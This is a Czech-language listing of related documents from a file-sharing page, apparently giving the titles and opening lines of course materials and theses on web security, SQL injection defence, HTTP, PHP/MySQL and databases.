X33EJA Security, Realms Zabezpečení webové vrstvy a EJB projektu Část nastavení specifická pro Glassfish, část dána Java EE 'web.xml' 'glassfish-web.xml' dále nutno nastavit realm v admin. konzoli GF 1
VíceSQL injection princip a ochrana
SQL injection princip a ochrana Základ injektáže Základní ochrana Proces zpracování SQL dotazu Prepared statements Minimalizace dopadu průniku nastavením práv Detekce průniku Kladení pastí 1 Cíle SQL injektáže
VíceZobrazování dat pomocí tabulek
4 Zobrazování dat pomocí tabulek Nyní už umíte využít spojené síly PHP a MySQL ke tvorbě dynamických stránek. Co však dělat v případě, chcete-li zobrazit opravdu velké množství řádků? Musíte mít nějaký
VíceUniverzita Pardubice. Fakulta elektrotechniky a informatiky
Univerzita Pardubice Fakulta elektrotechniky a informatiky Semestrální práce do předmětu IDAS2 Radek Fryšták st32304 / IT 2012 / 2013 Základní charakteristika Téma této smíšené semestrální práce pro předmět
VícePOLOPROVOZ ZNALOSTNÍ DATABÁZE INTERPI DOKUMENTACE
POLOPROVOZ ZNALOSTNÍ DATABÁZE INTERPI DOKUMENTACE INTERPI Interoperabilita v paměťových institucích Program aplikovaného výzkumu a vývoje národní kulturní identity (NAKI) (DF11P01OVV023) Zpracovali: Marie
VíceWWW technologie. HTTP protokol
WWW technologie HTTP protokol HTTP protokol Princip - klient server - klient zašle požadavek (request), obdrží odpověď (response). klient request server response Verze - HTTP protokol HTTP 0.9 HTTP 1.0
VícePánem World Wide Webu! aneb povídání o chybě hloupé tak, až to bolí
Pánem World Wide Webu! aneb povídání o chybě hloupé tak, až to bolí Roman Kümmel r.kummel@hacker-consulting.cz WFT?#!$... Session management HTTP je bezstavový protokol Server si nepamatuje předchozí kroky
VíceVYSOKÁ ŠKOLA POLYTECHNICKÁ JIHLAVA. Katedra elektrotechniky a informatiky. Obor Počítačové systémy
VYSOKÁ ŠKOLA POLYTECHNICKÁ JIHLAVA Katedra elektrotechniky a informatiky Obor Počítačové systémy Elektronická bezpečnost veřejných služeb bakalářská práce Autor: Jakub Novotný Vedoucí práce: Ing. Kamil
VíceVYSOKÉ UČENÍ TECHNICKÉ V BRNĚ
VYSOKÉ UČENÍ TECHNICKÉ V BRNĚ BRNO UNIVERSITY OF TECHNOLOGY FAKULTA INFORMAČNÍCH TECHNOLOGIÍ ÚSTAV INTELIGENTNÍCH SYSTÉMŮ FACULTY OF INFORMATION TECHNOLOGY DEPARTMENT OF INTELLIGENT SYSTEMS APLIKACE PRO
VíceBezpečnost webových aplikací
Bezpečnost webových aplikací Security of web applications Lukáš Zemek Bakalářská práce 2012 *** naskenované zadání str. 1 *** *** nascannované zadání str. 2 *** UTB ve Zlíně, Fakulta aplikované informatiky,
VíceWEB_SECURITY. David Sýkora. Phishing. Cryptography issues. Well known exploits. Bad configuration. Broken Auth. Injection CSRF.
WEB_SECURITY David Sýkora Webové aplikace tvoří v dnešní době bránu do kyber prostoru, který se stává součastí všedního života téměř všech lidí a právě proto je potřeba se zamýšlet nad problematikou bezpečnosti
VíceAnalýza síťového provozu. Ing. Dominik Breitenbacher Mgr. Radim Janča
Analýza síťového provozu Ing. Dominik Breitenbacher ibreiten@fit.vutbr.cz Mgr. Radim Janča ijanca@fit.vutbr.cz Obsah cvičení Komunikace na síti a internetu Ukázka nejčastějších protokolů na internetu Zachytávání
VíceSpecifikace vzdělávacích aktivit projektu Další vzdělávání zaměstnanců Insia a.s.
Specifikace vzdělávacích aktivit projektu Další vzdělávání zaměstnanců Insia a.s. oblast 1. MĚKKÉ A MANAŽERSKÉ DOVEDNOSTI Předpokládaný počet účastníků na jeden kurz: 12 Místo realizace: V prostorách dodavatele
VíceAJAX. Dynamické změny obsahu stránek
AJAX Dynamické změny obsahu stránek Co je AJAX Co je AJAX Co je AJAX Co je AJAX Co je AJAX AJAX = Asynchronous JavaScript And XML XHR = XMLHttpRequest Ajax je sada technik a nástrojů, které umožňují dynamické
VíceNávrh a tvorba WWW stránek 1/14. PHP a databáze
Návrh a tvorba WWW stránek 1/14 PHP a databáze nejčastěji MySQL součástí balíčků PHP navíc podporuje standard ODBC PHP nemá žádné šablony pro práci s databází princip práce s databází je stále stejný opakované
VíceÚvod do databázových systémů
Vysoká škola báňská Technická univerzita Ostrava Fakulta elektrotechniky a informatiky Katedra informatiky Database Research Group Úvod do databázových systémů Cvičení 3 Ing. Petr Lukáš petr.lukas@vsb.cz
VíceMODERNÍ WEB SNADNO A RYCHLE
SNADNO A RYCHLE Marek Lučný Pavoučí síť přes celý svět Co prohlížeče (ne)skrývají Tajemný kód HTML Všechno má svůj styl Interaktivní je IN Na obrazovce i na mobilu Začni podle šablony Informace jsou základ
VíceBankKlient. FAQs. verze 9.50
BankKlient FAQs verze 9.50 2 BankKlient Obsah: Úvod... 3 Instalace BankKlient možné problémy... 3 1. Nejsou instalovány požadované aktualizace systému Windows... 3 2. Instalační program hlásí, že nemáte
Více1. Vyhlašovatel. 2. Vymezení pojmů. mojeid pravidla motivačního programu pro poskytovatele služeb
mojeid pravidla 1. Vyhlašovatel... 1 2. Vymezení pojmů... 1 3. Předmět a účel motivačního programu... 2 4. Podmínky účasti v programu... 2 5. Práva a povinnosti... 2 5.1. Poskytovatel... 2 5.2. Vyhlašovatel...
VíceNový Node Monitor. 13. prosince 2008. Lukáš Turek Praha12.Net
Nový Node Monitor 13. prosince 2008 Lukáš Turek Praha12.Net Nový Node Monitor http://mapa.praha12.net 2 O čem to bude Proč je potřeba nová mapa Jak je implementována Další plány Integrace s IS sítí 3 Proč?
Více